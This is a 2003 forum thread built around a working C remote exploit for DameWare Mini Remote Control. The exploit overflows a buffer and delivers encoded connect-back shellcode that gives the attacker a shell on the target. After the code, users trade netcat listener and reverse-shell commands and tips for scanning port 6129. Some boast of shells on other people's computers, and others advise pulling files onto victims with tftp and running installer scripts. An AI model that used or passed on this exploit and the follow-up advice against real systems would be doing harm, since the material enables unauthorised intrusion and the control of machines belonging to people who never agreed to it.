GaLiaRePt
DameWare Mini Remote Control < v3.73 remote exploit
Date: 2003-12-20

Author : Iván Rodriguez Almuiña <kralor_@_coromputer.net>
Download : http://www.security-corporation.com/downlo...oit/DameWeird.c

CODE
/**************************************************************************************/
/*     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]    */
/* -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -   -  */
/* 8/10 win2k successfully exploited in blind mode (lang & type [pro,srv,etc] unknown) */
/* tested against dameware versions: v3.68  v3.72                                     */
/* In comments there's some information about offsets for jmp esp on diff OS.         */
/* I've fixed a problem in the shellc0de, when I check for kernel32.dll, on winXP it  */
/* is kernel32.dll, but on win2k it is KERNEL32.DLL (both in unicode format)          */
/* shellc0de is a bit long for this b0f, so ExitThread won't be called, but it is in  */
/* the shellcode.Some people reported me 2 different offsets for winXP pro, home, sp0 */
/* or sp1, so I don't know why it's different and I haven't XP at home I can't find   */
/* another better EIP for XP (hope this 2 offsets will be enough).                    */
/* greetz: MrNice,AnAc,TripaX & Decryptus for helping me to find the EIP values.      */
/*....................................................................................*/
/* informations: kralor[at]coromputer.net,www.coromputer.net,irc undernet #coromputer */
/**************************************************************************************/

#include <winsock.h>   /* must be included before windows.h */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment (lib,"ws2_32")

/*
0x717564B8   jmp esp in comctl32.dll
win2k fr adv srv sp2
win2k en adv srv sp3
win2k en adv srv sp4
win2k en srv     sp3
win2k fr pro     sp3
win2k en pro     sp4

// jmp esp @ 0x77E7898B | win2k fr adv srv sp 1
// jmp esp @ 0x717564B8 | Win2k fr adv srv sp2 & Win2k en srv sp3 & Win2k en adv srv sp4 & win2k fr pro sp3
// jmp esp @ 0x7751A3AB | Win2k fr adv srv sp2 Win2k fr adv srv sp3 & Win2k fr pro sp3

/*
#define RET_WIN2K_SP0 0x717564B8
#define RET_WIN2K_SP1 0x717564B8
#define RET_WIN2K_SP2 0x717564B8
#define RET_WIN2K_SP3 0x717564B8
#define RET_WIN2K_SP4 0x717564B8
#define RET_WINXP_SP0 0x7776FE1F
#define RET_WINXP_SP1 0x7776FE1F
*/

/* Value written over the saved return address. These are the little-endian
 * bytes of 0x717564B8, the comctl32.dll "jmp esp" listed in the table above
 * for the Windows 2000 builds. */
#define RET    "\xB8\x64\x75\x71"
/* Windows XP variant: the little-endian bytes of 0x7736D507. NOTE(review):
 * this does not match the RET_WINXP_* values (0x7776FE1F) in the commented-out
 * table above; that table is stale and is not used anywhere. */
#define RET_XP "\x07\xD5\x36\x77"
// or #define RET_XP "\xC1\x1C\x35\x77" // this offset has been reported by many people (0x77351CC1)

/* TCP port cnx() connects to: the DameWare MRC service port. */
#define PORT 6129
/* Size of the protocol buffer used by start_auth(); the "information" reply
 * is read until exactly this many bytes have arrived and the overflow packet
 * is sent with this exact length. */
#define SIZEOF 4096
/* Client-identity fields copied into the overflow packet at the fixed offsets
 * start_auth() uses. Their contents appear to be arbitrary filler; only
 * their positions matter for the packet layout. */
#define WINUSER "h4x0r"
#define WINHOST "l33t_home"
#define USERPROFILE_NAME "script kiddie"
#define USERPROFILE_COMPANY "g33k solutions."
#define USERPROFILE_LICENSE "11111-OEM-0001111-11111"
#define USERPROFILE_DATE "12/24/03 00:00:00"
#define INTERFACE_IP "192.168.1.1,192.168.1.2"
#define WINDOMAIN "l33t_d0m41n"
/* Version string the packet presents as the client version (presumably the
 * last vulnerable release; the header says v3.72 was tested). */
#define CLIENT_VERSION "3.72.0.0"

/*
void print_packet(char *buffer, int begin, int end)
{
int i,j;
char ascii[9];

for(i=begin,j=0;i<end;i++,j++) {
 if(i%10==0) {
  printf("\r\n%04d: ",i);
  j=0;
 memset(ascii,0,sizeof(ascii));
 }
printf("0x%02x ",(unsigned char)buffer[i]);
if(i%10==9) {
 ascii[10]=0x00;
 printf("%s",ascii);
 }
if(!isprint(buffer[i]))
 ascii[j]='.';
else
 ascii[j]=buffer[i];
}
printf("%s\r\n",ascii);
return;
}
*/

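/*
 * Open a TCP connection to the DameWare MRC service (PORT) on host.
 *
 * host  either a resolvable host name or a dotted-quad IPv4 address. Names
 *       are tried first through gethostbyname(); if that fails the string is
 *       parsed as a literal address.
 *
 * Returns the connected socket, or 0 on any failure. The caller tests the
 * result with `!sock`, so 0 stays the error sentinel even though Winsock
 * itself reports a failed socket() as INVALID_SOCKET, which is why the old
 * `if(!sock)` check could never fire. The socket is closed on every error
 * path so a failed attempt no longer leaks a handle.
 */
int cnx(char *host)
{
    SOCKET sock;
    struct sockaddr_in peer;
    struct hostent *he;
    size_t addr_len;

    /* Winsock returns INVALID_SOCKET (not 0) when socket() fails. */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("error: unable to create socket\r\n");
        return 0;
    }

    /* Zero the whole structure so sin_zero is not left uninitialized. */
    memset(&peer, 0, sizeof(peer));
    peer.sin_family = AF_INET;
    peer.sin_port = htons(PORT);

    if ((he = gethostbyname(host)) != NULL) {
        /* Never copy more than sin_addr can hold, whatever h_length says. */
        addr_len = (size_t)he->h_length;
        if (addr_len > sizeof(peer.sin_addr))
            addr_len = sizeof(peer.sin_addr);
        memcpy(&peer.sin_addr, he->h_addr, addr_len);
    } else if ((peer.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) {
        printf("error: cannot resolve host\r\n");
        closesocket(sock);
        return 0;
    }

    printf("[+] Connecting to %-30s ...", host);
    if (connect(sock, (struct sockaddr *)&peer, sizeof(peer)) != 0) {
        /* Every connect() failure (refused, timeout, unreachable) ends up
         * here; the original wording of the message is kept. */
        printf("error: connection refused\r\n");
        closesocket(sock);
        return 0;
    }
    printf("Done\r\n");
    return (int)sock;
}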

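/*
 * Patch the connect-back address into the XOR-encoded payload and apply the
 * OS-specific byte variants.
 *
 * os         0 = Windows 2000, 1 = Windows XP (decided by start_auth()).
 * sp         service-pack byte reported by the target. Unused: the per-SP
 *            return-address table was commented out, but the parameter is
 *            kept so the caller's interface is unchanged.
 * rhost      dotted-quad IPv4 address the shell connects back to.
 * rport      TCP port the shell connects back to, host byte order.
 * shellc0de  the encoded payload built in start_auth(), patched in place. It
 *            must be at least 454 bytes long because the XP variant writes
 *            offset 453.
 *
 * The payload's decoder XORs every byte with 0x95, so the address and port
 * are stored pre-XORed at fixed offsets (ip: 325..328, port: 319..320), both
 * in network byte order as the socket call inside the payload expects.
 *
 * Fix over the original: inet_addr() only understands dotted quads; given a
 * host name (or a typo) it returns INADDR_NONE, which used to be encoded
 * silently as 255.255.255.255 and the shell could never arrive. A warning is
 * now printed so the user knows why.
 */
void set_sc(int os, int sp, char *rhost, int rport, char *shellc0de)
{
    unsigned int ip;
    unsigned short port;
    unsigned char raw[4];
    int i;

    (void)sp; /* see the note on the per-SP table above */

    ip = inet_addr(rhost);
    if (ip == INADDR_NONE)
        printf("warning: '%s' is not a dotted-quad IPv4 address; the shell cannot connect back\r\n", rhost);

    /* Extract the bytes through memcpy instead of a char* alias; the result
     * is the same in-memory (network) order the original used. */
    memcpy(raw, &ip, 4);
    for (i = 0; i < 4; i++)
        shellc0de[325 + i] = (char)(raw[i] ^ 0x95);

    port = htons((unsigned short)rport);
    memcpy(raw, &port, 2);
    shellc0de[319] = (char)(raw[0] ^ 0x95);
    shellc0de[320] = (char)(raw[1] ^ 0x95);

    switch (os) {
    case 0: /* win2k: the encoded payload is used as-is */
        break;
    case 1:
        /* winXP: four bytes differ from the win2k payload. Presumably this
         * is the kernel32.dll name-casing difference the file header
         * mentions; not verified here. */
        shellc0de[167] = shellc0de[215] = (char)0xfe;
        shellc0de[345] = shellc0de[453] = (char)0xfe;
        break;
    default:
        /* Unknown OS id: leave the payload untouched, as the original did. */
        break;
    }
}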

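/*
 * Drive the DameWare MRC handshake on sock and deliver the overflow packet.
 *
 * sock   connected socket returned by cnx().
 * rhost  dotted-quad IPv4 address the shell connects back to.
 * rport  TCP port the shell connects back to.
 *
 * Returns 0 when the final reply looks like an accepted packet (0x32 0x11),
 * -1 on a protocol mismatch, a short or failed read, a failed send, or a
 * reply that suggests the target is patched. 0 only means the packet was
 * accepted: the shell itself arrives out of band at rhost:rport.
 *
 * Fixes over the original:
 *  - every recv() result is checked before buffer is indexed (the first
 *    reply is modified at offsets 28 and 36, so it must be >= 37 bytes);
 *  - the information-gathering loop bounds each read by the space left in
 *    buffer. It used to pass SIZEOF on every iteration, which can write past
 *    the end of the 4096-byte stack buffer, and a recv() error (-1) made the
 *    loop spin forever;
 *  - the service-pack string is printed with a bound, since a full 4096-byte
 *    reply is not guaranteed to contain a terminator;
 *  - a closed connection after the overflow packet is reported as such
 *    instead of as "Patched".
 */
int start_auth(int sock, char *rhost, int rport)
{
    int size, n, os, sp;
    char buffer[SIZEOF];
    /* XOR(0x95)-encoded connect-back payload; set_sc() patches the address,
     * port and OS-specific bytes in place. 462 bytes plus the terminator. */
    char shellc0de[] =
        "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
        "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
        "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
        "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
        "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
        "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
        "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
        "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
        "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
        "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
        "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
        "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
        "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
        "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
        "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
        "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
        "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
        "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
        "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
        "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
        "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
        "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
        "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
        "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
        "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
        "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
        "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
        "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
        "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

    /* First server packet: must start with 0x30 0x11. Offsets 28 and 36 are
     * rewritten below and the packet is echoed back, so anything shorter
     * than 37 bytes is treated as a protocol mismatch. */
    size = recv(sock, buffer, SIZEOF, 0);
    if (size < 37 || buffer[0] != 0x30 || buffer[1] != 0x11) {
        printf("error: wrong data received\r\n");
        return -1;
    }
    buffer[28] = 0x00;
    buffer[36] = 0x01;
    if (send(sock, buffer, size, 0) != size) {
        printf("error: send failed\r\n");
        return -1;
    }

    memset(buffer, 0, SIZEOF);
    printf("[+] Gathering %-30s     ...", "information");
    /* The reply is collected until SIZEOF bytes have arrived, possibly over
     * several segments. Each read is limited to the space left in buffer,
     * and a closed or broken connection aborts instead of looping forever. */
    for (size = 0; size < SIZEOF; size += n) {
        n = recv(sock, &buffer[size], SIZEOF - size, 0);
        if (n <= 0) {
            printf("error: connection lost while gathering information\r\n");
            return -1;
        }
    }

    if (buffer[0] != 0x10 || buffer[1] != 0x27) {
        printf("error: wrong data received\r\n");
        return -1;
    }
    printf("Done\r\n");

    /* Offset 37 holds the service-pack text the reply prints below; the raw
     * byte is passed to set_sc(), which currently ignores it. */
    sp = (unsigned char)buffer[37];
    printf("[i] Operating system : ");
    /* Original heuristic: either byte matching marks the target as XP. */
    if (buffer[16] == 0x28 || buffer[17] == 0x0a) {
        os = 1;
        printf("WinXP");
    } else {
        printf("Win2000");
        os = 0;
    }
    /* Bounded: a full 4096-byte reply need not be NUL-terminated. */
    printf("\r\n[i] Service Pack     : %.*s\r\n", SIZEOF - 37, &buffer[37]);
    printf("[+] Setting shellc0de for this %-15s   ...", "version");
    set_sc(os, sp, rhost, rport, shellc0de);

    /* Build the overflow packet. The first two bytes (0x10 0x27) are kept
     * from the reply; everything else is laid out at fixed offsets. */
    memset(&buffer[2], 0, SIZEOF - 2);
    strcpy(&buffer[175], WINUSER);
    memset(&buffer[416], 0x90, 180);           /* NOP sled up to the return address */
    if (os == 0)
        memcpy(&buffer[516], RET, 4);
    else
        memcpy(&buffer[516], RET_XP, 4);
    memcpy(&buffer[520], shellc0de, sizeof(shellc0de)); /* occupies 520..982 */
    /* NOTE: USERPROFILE_NAME at offset 975 overwrites the last 8 bytes of the
     * payload. This is intentional per the file header ("shellc0de is a bit
     * long for this b0f, so ExitThread won't be called"), so it is kept. */
    strcpy(&buffer[1200], WINHOST);
    strcpy(&buffer[975], USERPROFILE_NAME);
    strcpy(&buffer[1295], USERPROFILE_COMPANY);
    strcpy(&buffer[1495], USERPROFILE_LICENSE);
    strcpy(&buffer[1755], USERPROFILE_DATE);
    strcpy(&buffer[2015], WINHOST);
    strcpy(&buffer[2275], INTERFACE_IP);
    strcpy(&buffer[2535], WINDOMAIN);
    strcpy(&buffer[2795], CLIENT_VERSION);
    printf("Done\r\n");

    printf("[+] Sending evil %-30s  ...", "packet");
    if (send(sock, buffer, SIZEOF, 0) != SIZEOF) {
        printf("error: send failed\r\n");
        return -1;
    }
    memset(buffer, 0, SIZEOF);
    n = recv(sock, buffer, SIZEOF, 0);
    if (n <= 0) {
        /* The server went away without answering; distinguish this from a
         * reply that explicitly does not match. */
        printf("error: no reply from target (connection closed)\r\n");
        return -1;
    }

    if (buffer[0] != 0x32 || buffer[1] != 0x11) {
        printf("Patched\r\n");
        return -1;
    }
    printf("Done\r\n");
    printf("[i] Shell should be arrived at %s:%d\r\n", rhost, rport);
    return 0;
}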

/* Print the tool's banner: title line and author/contact line. */
void banner(void)
{
    static const char *lines[] = {
        "\r\n      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]\r\n",
        "\t\t  www.coromputer.net && undernet #coromputer\r\n\r\n",
    };
    size_t i;

    /* The banner text contains no conversion specifiers, so writing it
     * with fputs() produces exactly what printf() did. */
    for (i = 0; i < sizeof(lines) / sizeof(lines[0]); i++)
        fputs(lines[i], stdout);
}

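/*
 * Entry point: <program> <host> <your_ip> <your_port>
 *
 * host       target running the DameWare MRC service on PORT.
 * your_ip    dotted-quad IPv4 address the shell connects back to.
 * your_port  TCP port, 1-65535, on which a listener (e.g. nc -l -vv -p PORT)
 *            is already waiting.
 *
 * Returns 0 when start_auth() reports the packet was accepted, -1 otherwise
 * (bad arguments, Winsock failure, connection failure, protocol mismatch).
 *
 * Fixes over the original: the port was parsed with atoi(), so "abc" or
 * "70000" silently produced a payload that could never connect back (the
 * value is truncated to 16 bits inside set_sc()); it is now validated. The
 * socket and Winsock are released on every path, and the result of
 * start_auth() is propagated instead of being discarded.
 */
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    int sock, rc;
    long port;
    char *end;

    banner();
    if (argc != 4) {
        printf("syntax: %s <host> <your_ip> <your_port>\r\n", argv[0]);
        return -1;
    }

    port = strtol(argv[3], &end, 10);
    if (argv[3][0] == '\0' || *end != '\0' || port < 1 || port > 65535) {
        printf("error: <your_port> must be a number between 1 and 65535\r\n");
        return -1;
    }

    if (WSAStartup(0x0101, &wsaData) != 0) {
        printf("error: unable to load winsock\r\n");
        return -1;
    }
    sock = cnx(argv[1]);
    if (!sock) {
        WSACleanup();
        return -1;
    }
    rc = start_auth(sock, argv[2], (int)port);
    closesocket(sock);
    WSACleanup();
    return rc == 0 ? 0 : -1;
}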


Enjoy ;-)
X-FloppY
Hmm looks very nice
can someone compile it ?:X
temptation
DameWare Mini Remote Control
^^ on which port is this running?

thx
Lanig
hmm to scan for this vuln i need to scan port 6129 (default for this service i think)
or is there some better way?
Yosam
hmm, compiled successfully but,
what is <your_port> ?
what should i put in there?

and how do i scan for this?
which port should i scan and what banner (if needed) ?


thanks.
X-FloppY
Yosam can you please post the compiled exploit?
so we can help?


PuPPaFiSH
Thank for the info, I'll try and compile it wink.gif
Divx_dude
QUOTE (Yosam @ Dec 20 2003, 02:38 PM)
hmm, compiled successfully but,
what is <your_port> ?
what should i put in there?

and how do i scan for this?
which port should i scan and what banner (if needed) ?


thanks.

Well, you need a listener running on your own PC first, for example netcat on port 444 (`nc -l -vv -p 444`).

Then you run the exploit giving it your IP and the port your netcat is listening on; the shell connects back from the target to that port.


sorry for bad english
X-FloppY
i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam
KoNh
QUOTE (X-FloppY @ Dec 20 2003, 03:04 PM)
i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam

just try to compile yerself, this way we can
try to keep out some scripts kiddyz, unless yer one ?
X-FloppY
Sorry m8 i don't know how to compile ....
if ya like to teach me so pm me biggrin.gif
Divx_dude
dude wink.gif ther emany progs for compiling wink.gif

DEV c++ is a very good one wink.gif try google and search smile.gif

sorry for bad english
X-FloppY
k dude thank's
(:
btw can you compile this exploit for now?
JdEeZy
great exploit, got some shells.
Axl
QUOTE (Lanig @ Dec 20 2003, 02:37 PM)
hmm to scan for this vuln i need to scan port 6129 (default for this service i think)
or is there some better way?

I find scanning for 6129 to be most likely the best way. Problem is at least on the ranges i scan nobody has 6129 open mad.gif
Lanig
hmm i compiled this exploit but when i try it it just crashes my dameware mini remote control and not opening a shell but it might be my windows or something (winxp without sp1)
http://wave.prohosting.com/eperry/DWMRC.exe

enjoy smile.gif
ivan288
i found out that it does crash some boxes but that eventually u get a shell. my friend even got one on win2000 and i think this is suppose to be for Xp only.
Axl
no, it's not just for xp... i've gotten xp boxes and 2000 boxes with it only prob is they've got a/v and it kills you like 2 minutes after u get shell.
UnDeRTaKeR
i need some help m8's...
i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe


now i tried to exploit some box... and this what i got...
QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                  www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx                  ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack    : 4
[+] Setting shellc0de for this version          ...Done
[+] Sending evil packet                          ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>


how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...
mkwento
ho ho hoooo!!!!

merry christmas!!!

good job tongue.gif tongue.gif
basthen
same prob as Undertaker here

the box is running Win2003 and DameWare 3.70

mad.gif
illwill
http://illmob.org compiled version
Axl
QUOTE (KoNh @ Dec 20 2003, 03:57 PM)
QUOTE (X-FloppY @ Dec 20 2003, 03:04 PM)
i hate those that are compiling for theirselfs and not posting
it's annoying
like Yosam

just try to compile yerself, this way we can
try to keep out some scripts kiddyz, unless yer one ?

hmm i'd compile myself but i get environment variable errors and what not.
UN|K
i just want to know , how i can patch this hole

without re install another version smile.gif


where can i find a patch ??
XtrA
always its doing me this..
is it saying its not hackable?
CODE
dwmrc host_ip myip 333
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
www.coromputer.net && undernet #coromputer
[08:58:26] <[SkyeR]> [+] Connecting to X.X.X.X                   ...Done
[08:58:26] <[SkyeR]> error: wrong data received

one time its did me like that?
its like connecting but then connection refused
what may i do ? :\
CODE

dwmrc host myip 9630

     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to X.X.X.X                 ...error: connection refused
XtrA
plz help me!!
now i get in one :]]]]
im in his computer uploaded files and typed
net start serv-u but see:
CODE

net start serv-u
The Serv-U FTP Server service is starting.
Serv-U FTP Server service could not be started.
A service specific error occurred: 100.
More help is available by typing NET HELPMSG 3547.

what now?
what can i do ? :\\\\\
Axl
why don't you just name the service youarehacked ? Are you using firedaemon?
mastervampire
im like XtrA

i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?
Axl
QUOTE (mastervampire @ Dec 21 2003, 08:32 AM)
im like XtrA

i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?

start a tftp server wink.gif and do tftp -i yourip get filename tftp32 works great
mastervampire
do i have to download tftp server like it did have to download nc.exe ?
ma622
could anyone build a proggy which checks the scan.txt for vuln ips and promts it to output.txt without dropping to shell? wink.gif
XtrA
QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)
start a tftp server wink.gif and do tftp -i yourip get filename tftp32 works great

hmm
i try ..
i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..
UnDeRTaKeR
Hello anybody there?! Can some one please answer my questions?
shiz
QUOTE
Yosam can you please post the compiled exploit?
so we can help?


blah
stop whining and try compiling some yourself, instead of actin like a scriptkid in here..
will get you banned...
knientje
QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)
i need some help m8's...
i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe


now i tried to exploit some box... and this what i got...
QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                  www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx                   ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     : 4
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>


how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

i also like to know what to do then huh.gif
knientje
QUOTE (mastervampire @ Dec 21 2003, 08:32 AM)
im like XtrA

i got shell and im in this guys computer, browsing through his stuff, now how do i upload and execute a file on him?

how did ya connect to the shell?
Diablotic
QUOTE (knientje @ Dec 21 2003, 11:10 AM)
QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)
i need some help m8's...
i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe


now i tried to exploit some box... and this what i got...
QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                  www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx                   ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     : 4
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>


how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

i also like to know what to do then huh.gif

Did try to connect by Netcat on port 22?
knientje
QUOTE (Diablotic @ Dec 21 2003, 11:13 AM)
QUOTE (knientje @ Dec 21 2003, 11:10 AM)
QUOTE (UnDeRTaKeR @ Dec 20 2003, 11:52 PM)
i need some help m8's...
i started on my comp a shell like that:
QUOTE
nc.exe -L -p 22 -d -e CMD.exe


now i tried to exploit some box... and this what i got...
QUOTE

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>DameWei
rd xxx.x.xx.x xx.xx.xx.xx 22

      [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                  www.coromputer.net && undernet #coromputer

[+] Connecting to xxx.xx.x.xx                   ...Done
[+] Gathering information                        ...Done
[i] Operating system : Win2000
[i] Service Pack     : 4
[+] Setting shellc0de for this version           ...Done
[+] Sending evil packet                          ...Done
[i] Shell should be arrived at xx.xxx.xx.x:22

C:\Downloads\Exploits\Dameware Mini Remote Control Server Overflow Explo>


how do i get the shell?!
how the shell should arive?!

please help me...
BTW...
i tried another version that worked perfect exept Win2000SP2&SP4...

i also like to know what to do then huh.gif

Did try to connect by Netcat on port 22?

yeah, doesn't work sad.gif
mastervampire
QUOTE (XtrA @ Dec 21 2003, 09:46 AM)
QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)
start a tftp server wink.gif and do tftp -i yourip get filename tftp32 works great

hmm
i try ..
i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..

i get the same problem, timeout


dam it, i get lots of ips that i can get into but i cant upload a file to them :S allways timeout
UnDeRTaKeR
im clueless sad.gif
woodpecker_sjtu
who succed?
i cant get the shell
Divx_dude
QUOTE (XtrA @ Dec 21 2003, 07:13 AM)
always its doing me this..
is it saying its not hackable?
CODE
dwmrc host_ip myip 333
[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
www.coromputer.net && undernet #coromputer
[08:58:26] <[SkyeR]> [+] Connecting to X.X.X.X                   ...Done
[08:58:26] <[SkyeR]> error: wrong data received

one time its did me like that?
its like connecting but then connection refused
what may i do ? :\
CODE

dwmrc host myip 9630

     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to X.X.X.X                 ...error: connection refused

yo
CODE

dwmrc host myip 9630

     [Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
                 www.coromputer.net && undernet #coromputer

[+] Connecting to X.X.X.X                 ...error: connection refused



this means the connection to port 6129 was refused, so that IP isn't running DameWare Mini Remote Control (or the port is firewalled) wink.gif simple as that
slex
hi, I do C:\>nc -l -p 444 -e cmd.exe
and next

C:\dame>dameweird **.***.***.** **.***.**.*** 444

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt
]
www.coromputer.net && undernet #coromputer

[+] Connecting to **.***.***.** ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 6
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Done
[i] Shell should be arrived at **.***.**.***:444

but no shell binded on the port 444... why ?
:/


Axl
QUOTE (mastervampire @ Dec 21 2003, 11:26 AM)
QUOTE (XtrA @ Dec 21 2003, 09:46 AM)
QUOTE (QuantumTopology @ Dec 21 2003, 08:35 AM)
start a tftp server wink.gif and do tftp -i yourip get filename tftp32 works great

hmm
i try ..
i opened tftp server and typed ur command in the victim`s computer but tftp dont do nothing and then TimeOut on the victim`s computer..

i get the same problem, timeout


dam it, i get lots of ips that i can get into but i cant upload a file to them :S allways timeout

erm the tftp works great guys but when you transfer the big apps (as in 1 mb) the thing crashes... but u still get the whole thing transfered and u just have to reconnect. then just run your bats like normal *example: c:\windows\system32\inst.bat
matrix001
laugh.gif you must
nc -l -vv -p PORT

dmwrc.exe targetip yourip netcatport

e.g.

nc -l -vv -p 963

dmwrc.exe 12.12.12.12 66.66.66.66 963


If the exploit is sucessful a shell from the target (12.12.12.12) will conntect to your PC smile.gif
Axl
at last some wisdom !!!!


u idiot lamers !!!

u dont know whats a connect-back (reverse) shell ?!? OMG !!!

admin !!!! this forum is going down fasttttt......

nc.exe -l -p port -vvv

and then it will send a shell to your listening port !!!
UnDeRTaKeR
Axl Chill down...
X-FloppY
Chill m8 ppl is coming to learn
btw it's nc -l -vv -p port

EnjoY
Killahbee
But every time the same old message:

CODE

